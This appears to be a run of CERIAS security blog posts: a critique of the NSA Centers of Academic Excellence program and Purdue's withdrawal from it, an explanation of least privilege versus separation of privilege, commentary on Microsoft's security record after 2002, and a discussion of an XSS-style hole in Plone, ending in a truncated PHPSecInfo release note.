History
Back in 1997, the year before CERIAS was formally established, I testified before Congress on the state of cyber security in academia. In my testimony, I pointed out that there were only four established research groups, and their combined, yearly PhD production was around 3 per year, not counting cryptography.
Also in that testimony, I outlined that support was needed for new centers of expertise, and better support of existing centers.
As a result of that testimony, I was asked to participate in some discussions with staff from OSTP, from some Congressional committees (notably, the House Science Committee), and Richard Clarke's staff in the Executive Office of the President. I was also invited to some conversations with leadership at the NSA, including the deputy director for information security systems (IAD) (Mike Jacobs). Those discussions were about how to increase the profile of the area, and get more people educated in information security.
Among the ideas I discussed were ones expanded from my testimony. They eventually morphed into the Scholarship for Service program, the NSF CyberTrust program, and the NSA Centers of Academic Excellence (CAE). [NB. I am not going to claim sole or primary credit for these programs. I know I came up with the ideas, briefed people about them, discussed pros & cons, and then those groups took them and turned them into what we got. None of them are quite what I proposed, but that is how things happen in DC.]
The CAE program was established by the NSA in late 1998. The CAE certification was built around courses meeting CNSS requirements. Purdue was one of the first seven universities certified as CAEs, in May of 1999. We remained in the CAE program until earlier this year (2008). In 2003, DHS became a co-sponsor of the program.
Why Purdue is No Longer a CAE
In 2007, we were informed that unless we renewed our CNSS certifications by the end of August, we would not be eligible for CAE renewal in 2008. This prompted discussion and reflection by faculty and staff at CERIAS. As noted above, the mapping of CNSS requirements to our classes is non-trivial. The CAE application was also non-trivial. None of our personnel were willing to devote the hours of effort required to do the processing. Admittedly, we could have "faked" some of the mapping (as we know some schools have done in the past), but that was never an option for us. We had other objections, too (see what follows).As a result, we did not renew the certifications, and we dropped out of the CAE program when our certification expired earlier this year.
Our decision was not made lightly -- we nearly dropped out in 2004 when we last renewed (and were not grandfathered into the new 5 year renewal cycle, much to our annoyance), and there was continuing thought given to this over intervening years. We identified a number of issues with the program, and the overhead of the mapping and application process was not the only (or principal) issue.
First, and foremost, we do not believe it is possible to have 94 (most recent count) Centers of Excellence in this field. After the coming year, we would not be surprised if the number grew to over 100, and that is beyond silly. There may be at most a dozen centers of real excellence, and pretending that the ability to offer some courses and stock a small library collection means "excellence" isn't candid.
The program at this size is actually a Centers of Adequacy program. That isn't intended to be pejorative -- it is simply a statement about the size of the program and the nature of the requirements.
Some observers and colleagues outside the field have looked at the list of schools and made the observation that there is a huge disparity among the capabilities, student quality, resources and faculties of some of those schools. Thus, they have concluded, if those schools are all equivalent as "excellent" in cyber security, then that means that the good ones can't be very good ("excellent" means defining the best, after all). So, we have actually had pundits conclude that cyber security & privacy studies can't be much of a discipline. That is a disservice to the field as a whole.
Instead of actually designating excellence, the CAE program has become an ersatz certification program. The qualifications to be met are for minimums, not for excellence. In a field with so few real experts and so little money for advanced efforts, this is understandable given one of the primary goals of the CAE program -- to encourage schools to offer IA/IS programs. Thus, the program sets a relatively low bar and many schools have put in efforts and resources to meet those requirements. This is a good thing, because it has helped raise the awareness of the field. However, it currently doesn't set a high enough bar to improve the field, nor does it offer the resources to do so.
Setting a low bar also means that academic program requirements are being heavily influenced by a government agency rather than the academic community itself. This is not good for the field because it means the requirements are being set based on particular application need (of the government) rather than the academic community's understanding of foundations, history, guiding principles, and interaction with other fields. (E.g., Would your mathematics department base its courses on what is required to produce IRS auditors? We think not!) In practice, the CAE program has probably helped suppress what otherwise would be a trend by our community to discuss a formal, common curriculum standard. In this sense, participation in the CAE program may now be holding us back.
Second, and related, the CNSS standards are really training standards, and not educational standards. Some of them might be met by a multi-day class taught by a commercial service such as SANS or CSI -- what does that say about university-level classes we map to them? The original CNSS intent was to provide guidance for the production of trained system operators -- rather than the designers, researchers, thinkers, managers, investigators and more that some of our programs (and Purdue's, in particular) are producing.
We have found the CNSS standards to be time-consuming to map to courses, and in many cases inappropriate, and therefore inappropriate for our students. Tellingly, in 9 years we have never had a single one of our grads ask us for proof that they met the CNSS standards because an employer cared! We don't currently intend to offer courses structured around any of the CNSS standards, and it is past the point where we are interested in supporting the fiction that they are central to a real curriculum.
Third, we have been told repeatedly over the years that there might be resources made available for CAE schools if only we participated. It has never happened. The Scholarship for Service program is open to non-CAE schools (read the NSF program solicitation carefully), so don't think of that as an example. With 100 schools, what resources could reasonably be expected? If the NSA or DHS got an extra $5 million, and they spread it evenly, each would get $50,000. Take out institutional overhead charges, and that might be enough for 1 student scholarship...if that. If there were 10 schools, then $500,000 each is an amount that might begin to make a difference. But over a span of nearly 10 years the amount provided has been zero, and any way you divide that, it doesn't really help any of us. Thus, we have been investing time and energy in a program that has not brought us resources to improve. Some investment of our energy & time to bolster community was warranted, but that time is past.
Fourth, the renewal process is a burden because of the nature of university staffing and the time required. With no return on getting the designation, we could not find anyone willing to invest the time for the renewal effort.
Closing Comments
In conclusion, we see the CAE effort as valuable for smaller schools, or those starting programs. By having the accreditation (which is what this is, although it doesn't meet ISO standards for such), those programs can show some minimal capabilities, and perhaps obtain local resources to enhance them. However, for major programs with broader thrusts and a higher profile, the CAE has no real value, and may even have negative connotations. (And no, the new CAE-R program does not solve this as it is currently structured.)
The CAE program is based on training standards (CNSS) that do not have strong pedagogical foundations, and this is also not appropriate for a leading educational program. As the field continues to evolve over the next few years, faculty at CERIAS at Purdue expect to continue to play a leading role in shaping a real academic curriculum. That cannot be done by embracing the CAE.
We are confident that people who understand the field are not going to ignore the good schools simply because they don't have the designation, any more than people have ignored major CS programs because they do not have CSAB accreditation. We've been recognized for our excellence in research, we continue to attract and graduate excellent students, and we continue to serve the community. We are certain that people will recognize that and respond accordingly.
More importantly, this goes to the heart of what it means to be "trustworthy." Security and privacy issues are based on a concept of trust and that also implies honesty. It simply is not honest to continue to participate in (and thereby support) a designation that is misleading. There are not 94 centers of excellence in information and cyber security in the US. You might ask the personnel at some of the schools that are so designated as to why they feel the need to participate and shore up that unfortunate canard.
The above was originally written in 2008. A few years later, the CAE requirements were changed to add a CAE-R designation (R for research), and several of our students did the mapping so we were redesignated. Most of the criticisms remain accurate even in 2012.
Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task. Compartmentalization is a technique to separate code into parts on which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access. Why does this get confused all the time with separation of privilege? Separation of privilege is breaking up a *single* privilege amongst multiple, independent components or people, so that multiple agreement or collusion is necessary to perform an action (e.g., dual signature checks). So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege. It is essentially an “AND” logical operation; in its simplest form, a system would check several conditions before granting approval for an operation. Bishop uses the example of “su” or “sudo”; a user (or attacker of a compromised process) needs to know the appropriate password, and the user needs to be in a special group. A related, but not identical concept, is that of majority voting systems. Redundant systems have to agree, hopefully outvoting a defective system. If there was no voting, i.e., if all of the systems always had to agree, it would be separation of privilege. OpenSSH’s UsePrivilegeSeparation option is *not* an implementation of privilege separation by that definition, it simply runs compartmentalized code using least privilege on each compartment.
[tags]Vista, Windows, security,flaws,Microsoft[/tags]
Update: additions added 4/19 and 4/24, at the end.
Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million. That extreme measure was taken because of numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources. (I was told by one MS staffer that response to major security flaws often cost close to $1 million each for staff time, product changes, customer response, etc. I don’t know if that is true, but the reality certainly was/is a substantial number.)
Without a doubt, people inside Microsoft took the issue seriously. They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts. Security of the Microsoft code base suddenly became a Very Big Deal.
Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that metric was not otherwise qualified; a cynic might comment that such an achievement would not be difficult. The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch. Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but also serves to obscure how many different flaws are contained inside each patch set. The number of flaws maybe hasn’t really decreased all that much from years ago.
Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training. The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration. The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago. The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year. The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.
Microsoft seems to project the attitude that they have solved the security problem.
If that’s so, why are we still seeing significant security flaws appear that not only affect their old software, but their new software written under the new, extra special security regime, such as Vista and Longhorn? Examples such as the ANI flaw and the recent DNS flaw are both glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is another buffer overflow!! There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.
Undoubtedly, the $100 million spent back in 2002 was worth something—the code quality has definitely improved. There is greater awareness inside Microsoft about security and privacy issues. I also know for a fact that there are a lot of bright, talented and very motivated people inside Microsoft who care about these issues. But questions remain: did Microsoft get its money’s worth? Did it invest wisely and if so, why are we still seeing so many (and so many silly) security flaws? Why does it seem that security is no longer a priority? What does that portend for Vista, Longhorn, and Office 2007? (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior. )
I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there. I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”
What do you think?
[posted with ecto]
Update 4/19: The TCAAB does still continue to exist, apparently, but with a greater focus on privacy issues than security. I do not know who the current members might be.
Update 4/24: I have heard (informally) from someone inside Microsoft in informal response to this post. He pointed out several issues that I think are valid and deserve airing here;
Many of my questions still remain unanswered, including Mr. Nash’s condition….
Note: I’ve updated this article after getting some feedback from Alexander Limi.
A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.
The first describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript. Apparently no input or output filtering was being done. Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:
Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.
Well, yes, actually, it is a security hole. If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site. Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself. Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
The point here is (believe it or not) not to pick on Plone. This is a problem prevalent in most open source development (and in closed source dev, from my experience). People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.
Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques. Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background. If they continue to do so, they demonstrate a lack of concern for the safety of their customers.
Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs. Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques. Developers in the workforce today need to have access to materials and programs that will do the same. And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualifed and unqualified developers are no longer the norm on most web dev teams.
The newest version of PHPSecInfo, version 0.2, is now available. Here are the major changes:
phpinfo()
)PhpSecInfo_Test_Session_Save_Path